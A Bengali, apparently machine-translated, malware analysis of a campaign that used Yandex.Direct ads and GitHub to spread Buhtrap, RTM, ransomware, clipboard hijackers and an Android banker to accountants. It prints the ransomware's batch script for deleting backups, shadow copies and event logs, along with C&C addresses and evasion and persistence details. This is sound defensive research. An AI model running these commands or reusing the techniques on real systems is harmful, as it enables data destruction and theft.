ব্যাকডোর এবং বুহট্র্যাপ এনক্রিপ্টর Yandex.Direct ব্যবহার করে বিতরণ করা হয়েছিল

সাইবার আক্রমণে অ্যাকাউন্ট্যান্টদের লক্ষ্য করতে, আপনি কাজের নথিগুলি ব্যবহার করতে পারেন যা তারা অনলাইনে অনুসন্ধান করে। এটি মোটামুটি যা একটি সাইবার গ্রুপ গত কয়েক মাস ধরে করছে, পরিচিত ব্যাকডোর বিতরণ করছে। বুহট্র্যাপ и RTM, সেইসাথে ক্রিপ্টোকারেন্সি চুরি করার জন্য এনক্রিপ্টর এবং সফ্টওয়্যার। বেশিরভাগ লক্ষ্যবস্তু রাশিয়ায় অবস্থিত। Yandex.Direct-এ দূষিত বিজ্ঞাপন দিয়ে হামলা চালানো হয়েছিল। সম্ভাব্য ক্ষতিগ্রস্থদের একটি ওয়েবসাইটে নির্দেশিত করা হয়েছিল যেখানে তাদের একটি নথি টেমপ্লেটের ছদ্মবেশে একটি দূষিত ফাইল ডাউনলোড করতে বলা হয়েছিল। ইয়ানডেক্স আমাদের সতর্কতার পরে দূষিত বিজ্ঞাপন সরিয়ে দিয়েছে।

বুহট্র্যাপের সোর্স কোড অতীতে অনলাইনে ফাঁস হয়েছে যাতে যে কেউ এটি ব্যবহার করতে পারে। আমাদের কাছে আরটিএম কোড উপলব্ধতা সম্পর্কিত কোন তথ্য নেই।

এই পোস্টে আমরা আপনাকে বলব কিভাবে আক্রমণকারীরা Yandex.Direct ব্যবহার করে ম্যালওয়্যার বিতরণ করেছে এবং এটি GitHub-এ হোস্ট করেছে৷ পোস্টটি ম্যালওয়্যারের প্রযুক্তিগত বিশ্লেষণ দিয়ে শেষ হবে।

বুহট্র্যাপ এবং আরটিএম ব্যবসায় ফিরে এসেছে

বিস্তার এবং শিকারের প্রক্রিয়া

ক্ষতিগ্রস্থদের বিতরণ করা বিভিন্ন পেলোড একটি সাধারণ প্রচার প্রক্রিয়া ভাগ করে। আক্রমণকারীদের দ্বারা তৈরি সমস্ত দূষিত ফাইল দুটি ভিন্ন GitHub সংগ্রহস্থলে স্থাপন করা হয়েছিল।

সাধারণত, সংগ্রহস্থলে একটি ডাউনলোডযোগ্য দূষিত ফাইল থাকে, যা ঘন ঘন পরিবর্তিত হয়। যেহেতু GitHub আপনাকে একটি সংগ্রহস্থলে পরিবর্তনের ইতিহাস দেখতে দেয়, তাই আমরা দেখতে পারি একটি নির্দিষ্ট সময়ের মধ্যে কী ম্যালওয়্যার বিতরণ করা হয়েছিল। ক্ষতিকারককে দূষিত ফাইলটি ডাউনলোড করতে রাজি করাতে, উপরের চিত্রে দেখানো ওয়েবসাইট blanki-shabloni24[.]ru ব্যবহার করা হয়েছিল।

সাইটের ডিজাইন এবং দূষিত ফাইলগুলির সমস্ত নাম একটি একক ধারণা অনুসরণ করে - ফর্ম, টেমপ্লেট, চুক্তি, নমুনা, ইত্যাদি। বিবেচনা করে যে বুহট্র্যাপ এবং আরটিএম সফ্টওয়্যার ইতিমধ্যেই অ্যাকাউন্ট্যান্টদের উপর আক্রমণের জন্য ব্যবহার করা হয়েছে, আমরা ধরে নিয়েছি যে নতুন অভিযানে কৌশল একই। একমাত্র প্রশ্ন হল ভিকটিম কিভাবে হামলাকারীদের সাইটে গেল।

সংক্রমণ

অন্তত বেশ কয়েকজন সম্ভাব্য শিকার যারা এই সাইটে শেষ হয়েছে তারা দূষিত বিজ্ঞাপন দ্বারা আকৃষ্ট হয়েছিল। নীচে একটি উদাহরণ URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

আপনি লিঙ্ক থেকে দেখতে পাচ্ছেন, ব্যানারটি বৈধ অ্যাকাউন্টিং ফোরাম bb.f2[.]kz-এ পোস্ট করা হয়েছে। এটি লক্ষ করা গুরুত্বপূর্ণ যে ব্যানারগুলি বিভিন্ন সাইটে প্রদর্শিত হয়েছিল, সকলের একই প্রচারাভিযান আইডি (blanki_rsya) ছিল এবং বেশিরভাগ অ্যাকাউন্টিং বা আইনি সহায়তা পরিষেবাগুলির সাথে সম্পর্কিত৷ URL দেখায় যে সম্ভাব্য শিকার "চালান ফর্ম ডাউনলোড করুন" অনুরোধটি ব্যবহার করেছে, যা লক্ষ্যযুক্ত আক্রমণের আমাদের অনুমানকে সমর্থন করে। নীচে ব্যানার প্রদর্শিত সাইট এবং সংশ্লিষ্ট অনুসন্ধান ক্যোয়ারী আছে.

• চালান ফর্ম ডাউনলোড করুন – bb.f2[.]kz
• নমুনা চুক্তি - Ipopen[.]ru
• আবেদনের অভিযোগের নমুনা - 77metrov[.]ru
• চুক্তির ফর্ম - ফাঁকা-ডোগোভার-কুপলি-প্রদাজি[.]আরইউ
• নমুনা আদালতের পিটিশন - zen.yandex[.]ru
• নমুনা অভিযোগ - yurday[.]ru
• নমুনা চুক্তি ফর্ম - Regforum [.]ru
• চুক্তি ফর্ম - সহকারী [.]আরইউ
• নমুনা অ্যাপার্টমেন্ট চুক্তি – napravah[.]com
• আইনি চুক্তির নমুনা - avito[.]ru

blanki-shabloni24[.]ru সাইটটি একটি সাধারণ ভিজ্যুয়াল অ্যাসেসমেন্ট পাস করার জন্য কনফিগার করা হতে পারে। সাধারণত, GitHub-এর লিঙ্ক সহ একটি পেশাদার-সুদর্শন সাইটের দিকে নির্দেশ করে এমন একটি বিজ্ঞাপন স্পষ্টতই খারাপ কিছু বলে মনে হয় না। উপরন্তু, আক্রমণকারীরা প্রচারণার সময় সম্ভবত সীমিত সময়ের জন্য রিপোজিটরিতে দূষিত ফাইল আপলোড করেছে। বেশিরভাগ সময়, GitHub সংগ্রহস্থলে একটি খালি জিপ সংরক্ষণাগার বা একটি ফাঁকা EXE ফাইল থাকে। এইভাবে, আক্রমণকারীরা Yandex.Direct-এর মাধ্যমে বিজ্ঞাপন বিতরণ করতে পারে এমন সাইটগুলিতে যা সম্ভবত অ্যাকাউন্ট্যান্টদের দ্বারা পরিদর্শন করা হয়েছিল যারা নির্দিষ্ট অনুসন্ধান প্রশ্নের উত্তরে এসেছেন।

এর পরে, আসুন এইভাবে বিতরণ করা বিভিন্ন পেলোডগুলি দেখুন।

পেলোড বিশ্লেষণ

বিতরণের কালানুক্রম

দূষিত প্রচারণা অক্টোবর 2018 এর শেষে শুরু হয়েছিল এবং লেখার সময় সক্রিয় রয়েছে। যেহেতু সম্পূর্ণ সংগ্রহস্থলটি GitHub-এ সর্বজনীনভাবে উপলব্ধ ছিল, তাই আমরা ছয়টি ভিন্ন ম্যালওয়্যার পরিবারের বিতরণের একটি সঠিক টাইমলাইন সংকলন করেছি (নীচের চিত্রটি দেখুন)। গিট ইতিহাসের সাথে তুলনা করার জন্য ESET টেলিমেট্রি দ্বারা পরিমাপ করা ব্যানার লিঙ্কটি কখন আবিষ্কৃত হয়েছিল তা দেখানোর জন্য আমরা একটি লাইন যোগ করেছি। আপনি দেখতে পাচ্ছেন, এটি গিটহাবের পেলোডের প্রাপ্যতার সাথে ভাল সম্পর্কযুক্ত। ফেব্রুয়ারির শেষের দিকের অসঙ্গতিটি এই সত্য দ্বারা ব্যাখ্যা করা যেতে পারে যে আমাদের কাছে পরিবর্তনের ইতিহাসের অংশ ছিল না কারণ আমরা এটি সম্পূর্ণরূপে পাওয়ার আগে গিটহাব থেকে সংগ্রহস্থলটি সরানো হয়েছিল।

চিত্র 1. ম্যালওয়্যার বিতরণের কালানুক্রম।

কোড সাইনিং সার্টিফিকেট

ক্যাম্পেইনে একাধিক সার্টিফিকেট ব্যবহার করা হয়েছে। কিছুতে একাধিক ম্যালওয়্যার পরিবারের দ্বারা স্বাক্ষরিত হয়েছে, যা আরও নির্দেশ করে যে বিভিন্ন নমুনা একই প্রচারাভিযানের অন্তর্গত। প্রাইভেট কী উপলব্ধ থাকা সত্ত্বেও, অপারেটররা পদ্ধতিগতভাবে বাইনারিগুলিতে স্বাক্ষর করেনি এবং সমস্ত নমুনার জন্য কী ব্যবহার করেনি। ফেব্রুয়ারী 2019 এর শেষের দিকে, আক্রমণকারীরা একটি Google-মালিকানাধীন শংসাপত্র ব্যবহার করে অবৈধ স্বাক্ষর তৈরি করতে শুরু করে যার জন্য তাদের কাছে ব্যক্তিগত কী ছিল না।

প্রচারাভিযানের সাথে জড়িত সমস্ত শংসাপত্র এবং তারা যে ম্যালওয়্যার পরিবারগুলি স্বাক্ষর করে সেগুলি নীচের সারণীতে তালিকাভুক্ত করা হয়েছে৷

আমরা অন্যান্য ম্যালওয়্যার পরিবারের সাথে লিঙ্ক স্থাপন করতে এই কোড স্বাক্ষর শংসাপত্রগুলিও ব্যবহার করেছি৷ বেশিরভাগ শংসাপত্রের জন্য, আমরা এমন নমুনা খুঁজে পাইনি যা গিটহাব সংগ্রহস্থলের মাধ্যমে বিতরণ করা হয়নি। যাইহোক, TOV "MARIA" শংসাপত্রটি বটনেটের অন্তর্গত ম্যালওয়্যার স্বাক্ষর করতে ব্যবহৃত হয়েছিল ওয়াচোস, অ্যাডওয়্যার এবং খনির. এই ম্যালওয়্যার এই প্রচারণার সাথে সম্পর্কিত হওয়ার সম্ভাবনা কম। সম্ভবত, শংসাপত্রটি ডার্কনেটে কেনা হয়েছিল।

Win32/Filecoder.Buhtrap

প্রথম উপাদান যা আমাদের দৃষ্টি আকর্ষণ করেছিল নতুন আবিষ্কৃত Win32/Filecoder.Buhtrap। এটি একটি ডেলফি বাইনারি ফাইল যা কখনও কখনও প্যাকেজ করা হয়। এটি মূলত ফেব্রুয়ারী-মার্চ 2019 এ বিতরণ করা হয়েছিল। এটি একটি ransomware প্রোগ্রামের মতো আচরণ করে - এটি স্থানীয় ড্রাইভ এবং নেটওয়ার্ক ফোল্ডারগুলি অনুসন্ধান করে এবং সনাক্ত করা ফাইলগুলিকে এনক্রিপ্ট করে৷ এনক্রিপশন কী পাঠানোর জন্য এটি সার্ভারের সাথে যোগাযোগ করে না বলে আপোস করার জন্য এটির ইন্টারনেট সংযোগের প্রয়োজন নেই৷ পরিবর্তে, এটি মুক্তিপণ বার্তার শেষে একটি "টোকেন" যোগ করে এবং অপারেটরদের সাথে যোগাযোগ করতে ইমেল বা বিটমেসেজ ব্যবহার করার পরামর্শ দেয়।

যতটা সম্ভব সংবেদনশীল রিসোর্স এনক্রিপ্ট করার জন্য, Filecoder.Buhtrap একটি থ্রেড চালনা করে যা মূল সফ্টওয়্যার বন্ধ করার জন্য ডিজাইন করা হয়েছে যাতে এনক্রিপশনে হস্তক্ষেপ করতে পারে এমন মূল্যবান তথ্য ধারণকারী খোলা ফাইল হ্যান্ডলার থাকতে পারে। লক্ষ্য প্রক্রিয়াগুলি মূলত ডাটাবেস ম্যানেজমেন্ট সিস্টেম (DBMS)। উপরন্তু, Filecoder.Buhtrap ডেটা পুনরুদ্ধার কঠিন করতে লগ ফাইল এবং ব্যাকআপ মুছে দেয়। এটি করতে, নীচের ব্যাচ স্ক্রিপ্টটি চালান।

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap ওয়েবসাইট ভিজিটরদের সম্পর্কে তথ্য সংগ্রহ করার জন্য ডিজাইন করা একটি বৈধ অনলাইন আইপি লগার পরিষেবা ব্যবহার করে। এটি র‍্যানসমওয়্যারের শিকারদের ট্র্যাক করার উদ্দেশ্যে করা হয়েছে, যা কমান্ড লাইনের দায়িত্ব:

mshta.exe "javascript:document.write('');"

এনক্রিপশনের জন্য ফাইলগুলি নির্বাচন করা হয় যদি সেগুলি তিনটি বর্জন তালিকার সাথে মেলে না৷ প্রথমত, নিম্নলিখিত এক্সটেনশন সহ ফাইলগুলি এনক্রিপ্ট করা হয় না: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys এবং ব্যাট দ্বিতীয়ত, নীচের তালিকা থেকে যে সমস্ত ফাইলগুলির জন্য সম্পূর্ণ পাথে ডিরেক্টরি স্ট্রিং রয়েছে সেগুলি বাদ দেওয়া হয়েছে৷

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

তৃতীয়ত, নির্দিষ্ট ফাইলের নামগুলিও এনক্রিপশন থেকে বাদ দেওয়া হয়েছে, তাদের মধ্যে মুক্তিপণ বার্তার ফাইলের নাম। তালিকা নীচে উপস্থাপন করা হয়. স্পষ্টতই, এই সমস্ত ব্যতিক্রমগুলি মেশিনটি চলমান রাখার উদ্দেশ্যে, তবে ন্যূনতম রাস্তার যোগ্যতার সাথে।

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

ফাইল এনক্রিপশন স্কিম

একবার কার্যকর করা হলে, ম্যালওয়্যারটি একটি 512-বিট RSA কী জোড়া তৈরি করে৷ প্রাইভেট এক্সপোনেন্ট (d) এবং মডুলাস (n) তারপরে একটি হার্ড-কোডেড 2048-বিট পাবলিক কী (পাবলিক এক্সপোনেন্ট এবং মডুলাস), zlib-প্যাকড এবং বেস64 এনকোডেড দিয়ে এনক্রিপ্ট করা হয়। এর জন্য দায়ী কোডটি চিত্র 2 এ দেখানো হয়েছে।

চিত্র 2. 512-বিট RSA কী পেয়ার জেনারেশন প্রক্রিয়ার হেক্স-রে ডিকম্পাইলেশনের ফলাফল।

নীচে একটি জেনারেট করা ব্যক্তিগত কী সহ সাধারণ পাঠ্যের একটি উদাহরণ রয়েছে, যা মুক্তিপণ বার্তার সাথে সংযুক্ত একটি টোকেন৷

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

আক্রমণকারীদের পাবলিক কী নীচে দেওয়া হল.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

ফাইলগুলি একটি 128-বিট কী সহ AES-256-CBC ব্যবহার করে এনক্রিপ্ট করা হয়েছে। প্রতিটি এনক্রিপ্ট করা ফাইলের জন্য, একটি নতুন কী এবং একটি নতুন প্রারম্ভিক ভেক্টর তৈরি করা হয়। মূল তথ্য এনক্রিপ্ট করা ফাইলের শেষে যোগ করা হয়। আসুন এনক্রিপ্ট করা ফাইলের বিন্যাস বিবেচনা করা যাক।
এনক্রিপ্ট করা ফাইলগুলির নিম্নলিখিত শিরোনাম রয়েছে:

VEGA ম্যাজিক মান যোগ করার সাথে সোর্স ফাইল ডেটা প্রথম 0x5000 বাইটে এনক্রিপ্ট করা হয়েছে। সমস্ত ডিক্রিপশন তথ্য নিম্নলিখিত কাঠামো সহ একটি ফাইলের সাথে সংযুক্ত করা হয়েছে:

- ফাইলের আকার চিহ্নিতকারীতে একটি চিহ্ন রয়েছে যা নির্দেশ করে যে ফাইলটি আকারে 0x5000 বাইটের চেয়ে বড় কিনা
— AES কী ব্লব = ZlibCompress(RSAEncrypt(AES কী + IV, তৈরি করা RSA কী জোড়ার সর্বজনীন কী))
- RSA কী ব্লব = ZlibCompress(RSAEncrypt(জেনারেট করা RSA প্রাইভেট কী, হার্ড কোডেড RSA পাবলিক কী))

Win32/ClipBanker

Win32/ClipBanker হল একটি উপাদান যা অক্টোবরের শেষ থেকে ডিসেম্বর 2018 সালের শুরুর দিকে মাঝে মাঝে বিতরণ করা হয়েছিল। এর ভূমিকা হল ক্লিপবোর্ডের বিষয়বস্তু নিরীক্ষণ করা, এটি ক্রিপ্টোকারেন্সি ওয়ালেটের ঠিকানা খোঁজে। টার্গেট ওয়ালেট ঠিকানা নির্ধারণ করার পরে, ClipBanker এটিকে অপারেটরদের অন্তর্গত বলে বিশ্বাস করা ঠিকানা দিয়ে প্রতিস্থাপন করে। আমরা যে নমুনাগুলি পরীক্ষা করেছি তা বাক্সযুক্ত বা অস্পষ্ট ছিল না। আচরণকে মুখোশ করার জন্য ব্যবহৃত একমাত্র প্রক্রিয়া হল স্ট্রিং এনক্রিপশন। অপারেটর ওয়ালেট ঠিকানা RC4 ব্যবহার করে এনক্রিপ্ট করা হয়। টার্গেট ক্রিপ্টোকারেন্সি হল বিটকয়েন, বিটকয়েন ক্যাশ, ডোজকয়েন, ইথেরিয়াম এবং রিপল।

আক্রমণকারীদের বিটকয়েন ওয়ালেটে ম্যালওয়্যার ছড়িয়ে পড়ার সময়, ভিটিএস-এ একটি ছোট পরিমাণ পাঠানো হয়েছিল, যা প্রচারণার সাফল্যের উপর সন্দেহ প্রকাশ করে। উপরন্তু, এই লেনদেনগুলি ক্লিপব্যাঙ্কারের সাথে সম্পর্কিত ছিল এমন কোনও প্রমাণ নেই৷

Win32/RTM

Win32/RTM উপাদানটি মার্চ 2019 এর শুরুতে বেশ কিছু দিন বিতরণ করা হয়েছিল। আরটিএম হল ডেলফিতে লেখা একটি ট্রোজান ব্যাঙ্কার, যার লক্ষ্য দূরবর্তী ব্যাঙ্কিং ব্যবস্থা। 2017 সালে, ESET গবেষকরা প্রকাশ করেছেন বিস্তারিত বিশ্লেষণ এই প্রোগ্রামের, বিবরণ এখনও প্রাসঙ্গিক. জানুয়ারী 2019-এ, পালো অল্টো নেটওয়ার্কগুলিও মুক্তি পেয়েছে RTM সম্পর্কে ব্লগ পোস্ট.

বুহট্র্যাপ লোডার

কিছু সময়ের জন্য, একটি ডাউনলোডার গিটহাবে উপলব্ধ ছিল যা পূর্ববর্তী বুহট্র্যাপ সরঞ্জামগুলির মতো ছিল না। সে ঘুরে দাঁড়ায় https://94.100.18[.]67/RSS.php?<some_id> পরবর্তী পর্যায়ে পেতে এবং এটি মেমরিতে সরাসরি লোড করতে। আমরা দ্বিতীয় পর্যায়ের কোডের দুটি আচরণকে আলাদা করতে পারি। প্রথম URL-এ, RSS.php সরাসরি বুহট্র্যাপ ব্যাকডোর পাস করেছে - এই ব্যাকডোরটি সোর্স কোড ফাঁস হওয়ার পরে উপলব্ধ একটির মতো।

মজার বিষয় হল, আমরা বুহট্র্যাপ ব্যাকডোর সহ বেশ কয়েকটি প্রচারণা দেখি এবং সেগুলি বিভিন্ন অপারেটর দ্বারা পরিচালিত হয় বলে অভিযোগ৷ এই ক্ষেত্রে, প্রধান পার্থক্য হল যে ব্যাকডোরটি সরাসরি মেমরিতে লোড করা হয় এবং আমরা যে DLL স্থাপনা প্রক্রিয়ার সাথে কথা বলেছি তার সাথে সাধারণ স্কিম ব্যবহার করে না। সামনে. উপরন্তু, অপারেটররা C&C সার্ভারে নেটওয়ার্ক ট্রাফিক এনক্রিপ্ট করতে ব্যবহৃত RC4 কী পরিবর্তন করেছে। আমরা দেখেছি বেশিরভাগ প্রচারাভিযানে, অপারেটররা এই কী পরিবর্তন করতে বিরক্ত করেনি।

দ্বিতীয়, আরও জটিল আচরণ ছিল যে RSS.php URL অন্য লোডারে পাঠানো হয়েছিল। এটি কিছু অস্পষ্টতা প্রয়োগ করেছে, যেমন গতিশীল আমদানি টেবিল পুনর্নির্মাণ। বুটলোডারের উদ্দেশ্য হল C&C সার্ভারের সাথে যোগাযোগ করা msiofficeupd[.]com/api/F27F84EDA4D13B15/2, লগগুলি পাঠান এবং একটি প্রতিক্রিয়ার জন্য অপেক্ষা করুন৷ এটি একটি ব্লব হিসাবে প্রতিক্রিয়া প্রক্রিয়া করে, এটি মেমরিতে লোড করে এবং এটি কার্যকর করে। আমরা এই লোডারটি চালানোর জন্য যে পেলোডটি দেখেছি তা একই বুহট্র্যাপ ব্যাকডোর ছিল, তবে অন্যান্য উপাদান থাকতে পারে।

Android/Spy.Banker

মজার বিষয় হল, অ্যান্ড্রয়েডের জন্য একটি উপাদানও গিটহাব সংগ্রহস্থলে পাওয়া গেছে। তিনি শুধুমাত্র একটি দিনের জন্য প্রধান শাখায় ছিলেন - নভেম্বর 1, 2018। GitHub এ পোস্ট করা ছাড়াও, ESET টেলিমেট্রি এই ম্যালওয়্যার বিতরণের কোনো প্রমাণ খুঁজে পায়নি।

উপাদানটি একটি অ্যান্ড্রয়েড অ্যাপ্লিকেশন প্যাকেজ (এপিকে) হিসাবে হোস্ট করা হয়েছিল। এটা প্রচন্ডভাবে অস্পষ্ট. APK-এ অবস্থিত একটি এনক্রিপ্ট করা JAR-এ দূষিত আচরণ লুকিয়ে আছে। এটি এই কী ব্যবহার করে RC4 দিয়ে এনক্রিপ্ট করা হয়েছে:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

স্ট্রিং এনক্রিপ্ট করতে একই কী এবং অ্যালগরিদম ব্যবহার করা হয়। JAR অবস্থিত APK_ROOT + image/files. ফাইলের প্রথম 4 বাইটে এনক্রিপ্ট করা JAR এর দৈর্ঘ্য থাকে, যা দৈর্ঘ্য ক্ষেত্রের পরপরই শুরু হয়।

ফাইলটি ডিক্রিপ্ট করার পরে, আমরা আবিষ্কার করেছি যে এটি আনুবিস ছিল - আগে নথিভুক্ত অ্যান্ড্রয়েডের জন্য ব্যাংকার। ম্যালওয়্যারের নিম্নলিখিত বৈশিষ্ট্য রয়েছে:

• মাইক্রোফোন রেকর্ডিং
• স্ক্রিনশট নেওয়া
• জিপিএস স্থানাঙ্ক পাওয়া
• keylogger
• ডিভাইস ডেটা এনক্রিপশন এবং মুক্তিপণ দাবি
• স্প্যাম পাঠানো

মজার বিষয় হল, ব্যাঙ্কার অন্য C&C সার্ভার পাওয়ার জন্য একটি ব্যাকআপ যোগাযোগ চ্যানেল হিসাবে টুইটার ব্যবহার করেছিলেন। আমরা যে নমুনা বিশ্লেষণ করেছি সেটি @JonesTrader অ্যাকাউন্ট ব্যবহার করেছে, কিন্তু বিশ্লেষণের সময় এটি ইতিমধ্যেই ব্লক করা হয়েছে।

ব্যাংকার অ্যান্ড্রয়েড ডিভাইসে লক্ষ্য অ্যাপ্লিকেশনের একটি তালিকা রয়েছে. এটি সোফোস গবেষণায় প্রাপ্ত তালিকার চেয়ে দীর্ঘ। তালিকায় অনেক ব্যাঙ্কিং অ্যাপ্লিকেশন, অ্যামাজন এবং ইবে-এর মতো অনলাইন শপিং প্রোগ্রাম এবং ক্রিপ্টোকারেন্সি পরিষেবা অন্তর্ভুক্ত রয়েছে।

MSIL/ClipBanker.IH

এই প্রচারণার অংশ হিসাবে বিতরণ করা শেষ উপাদানটি ছিল .NET উইন্ডোজ এক্সিকিউটেবল, যা মার্চ 2019 এ উপস্থিত হয়েছিল। অধ্যয়ন করা সংস্করণগুলির বেশিরভাগই ConfuserEx v1.0.0 দিয়ে প্যাকেজ করা হয়েছিল৷ ক্লিপব্যাঙ্কারের মতো, এই উপাদানটি ক্লিপবোর্ড ব্যবহার করে। তার লক্ষ্য হল বিস্তৃত ক্রিপ্টোকারেন্সি, সেইসাথে স্টিমে অফার। উপরন্তু, তিনি বিটকয়েন ব্যক্তিগত WIF কী চুরি করতে আইপি লগার পরিষেবা ব্যবহার করেন।

সুরক্ষা ব্যবস্থা
ConfuserEx ডিবাগিং, ডাম্পিং এবং টেম্পারিং প্রতিরোধে যে সুবিধাগুলি প্রদান করে তার পাশাপাশি, উপাদানটিতে অ্যান্টিভাইরাস পণ্য এবং ভার্চুয়াল মেশিন সনাক্ত করার ক্ষমতা অন্তর্ভুক্ত রয়েছে।

এটি একটি ভার্চুয়াল মেশিনে চলে তা যাচাই করতে, ম্যালওয়্যারটি বিল্ট-ইন উইন্ডোজ WMI কমান্ড লাইন (WMIC) ব্যবহার করে BIOS তথ্যের অনুরোধ করে, যথা:

wmic bios

তারপর প্রোগ্রামটি কমান্ড আউটপুট পার্স করে এবং কীওয়ার্ডগুলি সন্ধান করে: VBOX, VirtualBox, XEN, qemu, bochs, VM।

অ্যান্টিভাইরাস পণ্য সনাক্ত করতে, ম্যালওয়্যার ব্যবহার করে উইন্ডোজ সিকিউরিটি সেন্টারে একটি উইন্ডোজ ম্যানেজমেন্ট ইনস্ট্রুমেন্টেশন (WMI) অনুরোধ পাঠায় ManagementObjectSearcher API নীচে দেখানো হিসাবে. বেস 64 থেকে ডিকোড করার পরে কলটি এইরকম দেখায়:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

চিত্র 3. অ্যান্টিভাইরাস পণ্য সনাক্ত করার প্রক্রিয়া।

উপরন্তু, ম্যালওয়্যার কিনা তা পরীক্ষা করে CryptoClipWatcher, ক্লিপবোর্ড আক্রমণ থেকে রক্ষা করার জন্য একটি টুল এবং, যদি চলমান থাকে, সেই প্রক্রিয়ার সমস্ত থ্রেড স্থগিত করে, যার ফলে সুরক্ষা নিষ্ক্রিয় হয়।

জেদ

ম্যালওয়ারের যে সংস্করণটি আমরা অধ্যয়ন করেছি তা নিজেই অনুলিপি করে৷ %APPDATA%googleupdater.exe এবং গুগল ডিরেক্টরির জন্য "লুকানো" বৈশিষ্ট্য সেট করে। তারপর সে মান পরিবর্তন করে SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell উইন্ডোজ রেজিস্ট্রিতে এবং পাথ যোগ করে updater.exe. এইভাবে, ব্যবহারকারী যতবার লগ ইন করবে ম্যালওয়্যারটি কার্যকর করা হবে।

বিদ্বেষপূর্ণ আচরণ

ক্লিপব্যাঙ্কারের মতো, ম্যালওয়্যার ক্লিপবোর্ডের বিষয়বস্তু নিরীক্ষণ করে এবং ক্রিপ্টোকারেন্সি ওয়ালেট ঠিকানাগুলি সন্ধান করে এবং যখন পাওয়া যায়, তখন এটি অপারেটরের ঠিকানাগুলির মধ্যে একটি দিয়ে প্রতিস্থাপন করে৷ কোডে যা পাওয়া যায় তার উপর ভিত্তি করে নীচে লক্ষ্য ঠিকানাগুলির একটি তালিকা রয়েছে৷

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

প্রতিটি ধরনের ঠিকানার জন্য একটি সংশ্লিষ্ট নিয়মিত অভিব্যক্তি আছে। STEAM_URL মানটি স্টিম সিস্টেমকে আক্রমণ করার জন্য ব্যবহার করা হয়, যা রেগুলার এক্সপ্রেশন থেকে দেখা যায় যা বাফারে সংজ্ঞায়িত করতে ব্যবহৃত হয়:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

এক্সফিল্ট্রেশন চ্যানেল

